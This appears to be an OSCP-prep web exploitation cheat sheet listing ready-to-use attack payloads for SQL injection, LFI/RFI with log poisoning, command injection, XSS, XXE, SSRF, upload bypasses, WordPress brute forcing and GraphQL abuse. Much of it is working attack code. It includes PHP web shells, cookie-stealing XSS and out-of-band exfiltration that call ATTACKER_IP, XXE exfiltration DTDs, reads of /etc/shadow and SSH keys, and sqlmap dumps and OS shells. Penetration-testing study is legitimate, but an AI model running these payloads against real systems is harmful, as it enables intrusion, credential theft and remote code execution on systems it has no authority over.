// notes/ Web Exploitation
🕸️
Web Exploitation Cheatsheet
SQLi, XSS, LFI/RFI, SSRF, IDOR, deserialization, and common web payloads.
#web#owasp#cheatsheet
source · airouboss/oscp-prep-notes-2026 · cheat-sheets/web-exploitation.md ↗Web Exploitation
Dir-Enum
Gobuster
bash
$# Directory enumeration$gobuster dir -u http://TARGET -w /usr/share/wordlists/dirb/common.txt$ $# With file extensions$gobuster dir -u http://TARGET -w /usr/share/wordlists/dirb/common.txt -x php,txt,html,bak$ $# DNS subdomain enumeration$gobuster dns -d TARGET.com -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt$ $# VHost enumeration$gobuster vhost -u http://TARGET -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt$ $# Useful options$-k : Skip SSL verification$-t : Number of threads (default 10)$-o : Output file$-b : Exclude status codes$-s : Show only these status codesFfuf
bash
$# Directory fuzzing$ffuf -u http://TARGET/FUZZ -w /usr/share/wordlists/dirb/common.txt$ $# File extension fuzzing$ffuf -u http://TARGET/index.FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/web-extensions.txt$ $# VHost fuzzing$ffuf -u http://TARGET -H "Host: FUZZ.TARGET.com" -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -fs 1234$ $# POST data fuzzing$ffuf -u http://TARGET/login.php -X POST -d "username=admin&password=FUZZ" -w /usr/share/wordlists/rockyou.txt -fc 401$ $# Useful options$-mc : Match status codes$-fc : Filter status codes$-fs : Filter response size$-fw : Filter word count$-ms : Match response size$-t : Threads (default 40)$-r : Follow redirectsDirsearch
bash
$# Basic scan$dirsearch -u http://TARGET$ $# With extensions$dirsearch -u http://TARGET -e php,html,txt$ $# Custom wordlist$dirsearch -u http://TARGET -w /path/to/wordlist.txt$ $# Recursive$dirsearch -u http://TARGET -rCommon Wordlists
bash
$# Directories$/usr/share/wordlists/dirb/common.txt$/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt$/usr/share/seclists/Discovery/Web-Content/common.txt$/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt$ $# Subdomains$/usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txtSQLi
Detection
bash
$# Simple tests$' OR '1'='1$' OR '1'='1'--$' OR '1'='1'#$' OR '1'='1'/*$admin' --$admin' #Manual Enumeration
sql
01# Determine number of columns02' ORDER BY 1--03' ORDER BY 2--04' ORDER BY 3--05 06# Find injectable columns07' UNION SELECT NULL,NULL,NULL--08' UNION SELECT 1,2,3--09 10# Database enumeration (MySQL)11' UNION SELECT 1,schema_name,3 FROM information_schema.schemata--12' UNION SELECT 1,table_name,3 FROM information_schema.tables WHERE table_schema=database()--13' UNION SELECT 1,column_name,3 FROM information_schema.columns WHERE table_name='users'--14' UNION SELECT 1,username,password FROM users--15 16# Database enumeration (MSSQL)17' UNION SELECT 1,name,3 FROM master..sysdatabases--18' UNION SELECT 1,name,3 FROM sysobjects WHERE xtype='U'--SQLMap
bash
$# Basic scan$sqlmap -u "http://TARGET/page.php?id=1"$ $# With authentication$sqlmap -u "http://TARGET/page.php?id=1" --cookie="PHPSESSID=abc123"$ $# POST request$sqlmap -u "http://TARGET/login.php" --data="username=admin&password=pass"$ $# Enumerate databases$sqlmap -u "http://TARGET/page.php?id=1" --dbs$ $# Enumerate tables$sqlmap -u "http://TARGET/page.php?id=1" -D database_name --tables$ $# Dump data$sqlmap -u "http://TARGET/page.php?id=1" -D database_name -T users --dump$ $# OS shell (if possible)$sqlmap -u "http://TARGET/page.php?id=1" --os-shell$ $# Tamper scripts for WAF bypass$sqlmap -u "http://TARGET/page.php?id=1" --tamper=space2commentLFI-RFI
Local File Inclusion (LFI)
Basic LFI
bash
$# Linux$http://TARGET/page.php?file=../../../../etc/passwd$http://TARGET/page.php?file=../../../../etc/shadow$http://TARGET/page.php?file=../../../../home/user/.ssh/id_rsa$http://TARGET/page.php?file=../../../../var/log/apache2/access.log$ $# Windows$http://TARGET/page.php?file=../../../../windows/system32/drivers/etc/hosts$http://TARGET/page.php?file=../../../../windows/win.ini$http://TARGET/page.php?file=../../../../xampp/apache/logs/access.logBypass Techniques
bash
$# Null byte (PHP < 5.3.4)$http://TARGET/page.php?file=../../../../etc/passwd%00$ $# Double encoding$http://TARGET/page.php?file=..%252f..%252f..%252fetc%252fpasswd$ $# Path truncation$http://TARGET/page.php?file=../../../../etc/passwd............................$ $# Filter bypass$http://TARGET/page.php?file=....//....//....//etc/passwdLog Poisoning
bash
$# Poison Apache logs via User-Agent$curl -A "<?php system(\$_GET['cmd']); ?>" http://TARGET/$ $# Then access log with command$http://TARGET/page.php?file=../../../../var/log/apache2/access.log&cmd=id$ $# SSH log poisoning$ssh '<?php system($_GET["cmd"]); ?>'@TARGET$http://TARGET/page.php?file=../../../../var/log/auth.log&cmd=idPHP Wrappers
bash
$# Read PHP source code (base64)$http://TARGET/page.php?file=php://filter/convert.base64-encode/resource=index.php$ $# Command execution$http://TARGET/page.php?file=data://text/plain,<?php system($_GET['cmd']); ?>&cmd=id$http://TARGET/page.php?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ID8%2b&cmd=id$ $# expect wrapper (if enabled)$http://TARGET/page.php?file=expect://idRemote File Inclusion (RFI)
bash
$# Basic RFI$http://TARGET/page.php?file=http://ATTACKER_IP/shell.txt$ $# Create malicious file$echo '<?php system($_GET["cmd"]); ?>' > shell.txt$python3 -m http.server 80$ $# Execute$http://TARGET/page.php?file=http://ATTACKER_IP/shell.txt&cmd=idCommand-Injection
Detection
bash
$# Linux$; id$| id$|| id$& id$&& id$`id`$$(id)$ $# Windows$& whoami$&& whoami$| whoami$|| whoamiBlind Command Injection
bash
$# Time-based detection$; sleep 10$| sleep 10$& ping -c 10 127.0.0.1$ $# Out-of-band (DNS/HTTP)$; nslookup $(whoami).ATTACKER_DOMAIN$; curl http://ATTACKER_IP/$(whoami)Bypass Techniques
bash
$# Use variables$cat${IFS}/etc/passwd$cat</etc/passwd${cat,/etc/passwd}$ $# Hex encoding$$(echo -e "\x63\x61\x74\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64")$ $# Base64 encoding$echo "Y2F0IC9ldGMvcGFzc3dk" | base64 -d | bashXSS
Reflected XSS
html
01<script>alert(document.cookie)</script>02<img src=x onerror=alert(document.cookie)>03<svg onload=alert(document.cookie)>04<iframe src="javascript:alert(document.cookie)">Stored XSS
html
01<!-- Cookie stealing -->02<script>03fetch('http://ATTACKER_IP/?cookie=' + document.cookie);04</script>05 06<!-- Redirect to attacker site -->07<script>08window.location='http://ATTACKER_IP/?cookie=' + document.cookie;09</script>XSS Bypass
html
01# Uppercase/lowercase02<ScRiPt>alert(1)</sCrIpT>03 04# Without script tag05<img src=x onerror=alert(1)>06<body onload=alert(1)>07 08# Encoding09<script>alert(String.fromCharCode(88,83,83))</script>XXE-SSRF
XML External Entity (XXE)
Basic XXE
xml
01<?xml version="1.0"?>02<!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]>03<root>&test;</root>Blind XXE (Out-of-band)
xml
01<?xml version="1.0"?>02<!DOCTYPE root [<!ENTITY % remote SYSTEM 'http://ATTACKER_IP/evil.dtd'>%remote;]>03<root></root>evil.dtd:
xml
01<!ENTITY % file SYSTEM "file:///etc/passwd">02<!ENTITY % eval "<!ENTITY % exfil SYSTEM 'http://ATTACKER_IP/?x=%file;'>">03%eval;04%exfil;Server-Side Request Forgery (SSRF)
Basic SSRF
bash
$# Access internal services$http://TARGET/fetch?url=http://127.0.0.1:80$http://TARGET/fetch?url=http://localhost:22$http://TARGET/fetch?url=http://169.254.169.254/latest/meta-data/$ $# File access$http://TARGET/fetch?url=file:///etc/passwdBypass Techniques
bash
$# Different encodings$http://TARGET/fetch?url=http://0x7f.0x0.0x0.0x1$http://TARGET/fetch?url=http://2130706433 # Decimal for 127.0.0.1$http://TARGET/fetch?url=http://127.1$ $# DNS rebinding$http://TARGET/fetch?url=http://localtest.meFile-Upload
Bypass File Type Restrictions
bash
$# Double extensions$shell.php.jpg$shell.jpg.php$ $# Null byte$shell.php%00.jpg$ $# Magic bytes$GIF89a; <?php system($_GET['cmd']); ?>$ $# Content-Type manipulation$Change Content-Type to image/jpeg while uploading PHP shell$ $# Case sensitivity$shell.PhP$shell.pHpWeb Shells
Simple PHP Shell
php
01<?php system($_GET['cmd']); ?>More Advanced
php
01<?php02if(isset($_REQUEST['cmd'])){03 echo "<pre>";04 $cmd = ($_REQUEST['cmd']);05 system($cmd);06 echo "</pre>";07}08?>CMS-Enum
WordPress
WPScan
bash
$# Basic scan$wpscan --url http://TARGET$ $# Enumerate users$wpscan --url http://TARGET --enumerate u$ $# Enumerate plugins$wpscan --url http://TARGET --enumerate p$ $# Enumerate themes$wpscan --url http://TARGET --enumerate t$ $# Enumerate vulnerable plugins (requires API token)$wpscan --url http://TARGET --enumerate vp --api-token YOUR_TOKEN$ $# Aggressive scan$wpscan --url http://TARGET --enumerate ap,at,u --plugins-detection aggressive$ $# Password brute force$wpscan --url http://TARGET --usernames admin --passwords /usr/share/wordlists/rockyou.txtManual Enumeration
bash
$# Check WordPress version$curl http://TARGET/ | grep 'content="WordPress'$ $# User enumeration$http://TARGET/?author=1$http://TARGET/wp-json/wp/v2/users$ $# xmlrpc.php exploitation$curl -X POST -d "<methodCall><methodName>system.listMethods</methodName></methodCall>" http://TARGET/xmlrpc.phpGraphQL
Introspection
graphql
01# Full schema02{ __schema { types { name fields { name type { name kind } } } } }03 04# Query type fields05{ __schema { queryType { fields { name description } } } }06 07# Specific type08{ __type(name: "User") { name fields { name type { name } } } }Basic Queries & Mutations
graphql
01# Query with arguments02{ user(id: "1") { username email role } }03 04# Nested query05{ user(id: "1") { username posts { title content } } }06 07# Mutation - create/update08mutation { createUser(username: "admin", password: "pass123") { id username } }09mutation { updateUser(id: "1", role: "admin") { id role } }Auth Bypass
graphql
01# Try unauthenticated02{"query": "{ users { id username email } }"}03 04# SQL injection in argument05{ user(id: "1' OR '1'='1") { username password } }06 07# NoSQL injection08{ login(username: {$ne: ""}, password: {$ne: ""}) { token } }09 10# Parameter tampering11mutation { updateUser(id: "1", role: "admin", isAdmin: true) { username role } }Injection Testing
graphql
01# Command injection02mutation { ping(host: "127.0.0.1; cat /etc/passwd") { result } }03 04# Path traversal05{ file(path: "../../../../etc/passwd") { content } }06 07# SSTI08mutation { render(input: "{{config.items()}}") { output } }Bypassing Disabled Introspection
graphql
01# Field suggestions via typos reveal field names02{ __schema { types { nam } } }03 04# Partial introspection05{ __type(name: "Query") { fields { name } } }06{ __type(name: "User") { fields { name } } }07{ __type(name: "Admin") { fields { name } } }08 09# Clairvoyance (wordlist-based schema recovery)10python3 -m clairvoyance -u http://TARGET/graphql -o schema.jsonTools
bash
$# Introspection via curl$curl -X POST http://TARGET/graphql \$ -H "Content-Type: application/json" \$ -d '{"query": "{ __schema { types { name } } }"}'$ $# get-graphql-schema$get-graphql-schema http://TARGET/graphql > schema.graphql$ $# GraphQLmap$python3 graphqlmap.py -u http://TARGET/graphql$ $# InQL (Burp Suite extension) - https://github.com/doyensec/inql$# GraphQL Voyager (schema visualizer) - https://github.com/APIs-guru/graphql-voyager$ $# SQLMap against GraphQL$sqlmap -u "http://TARGET/graphql" \$ --data='{"query":"{ user(id:\"INJECT_HERE\") { username } }"}' \$ --headers="Content-Type: application/json"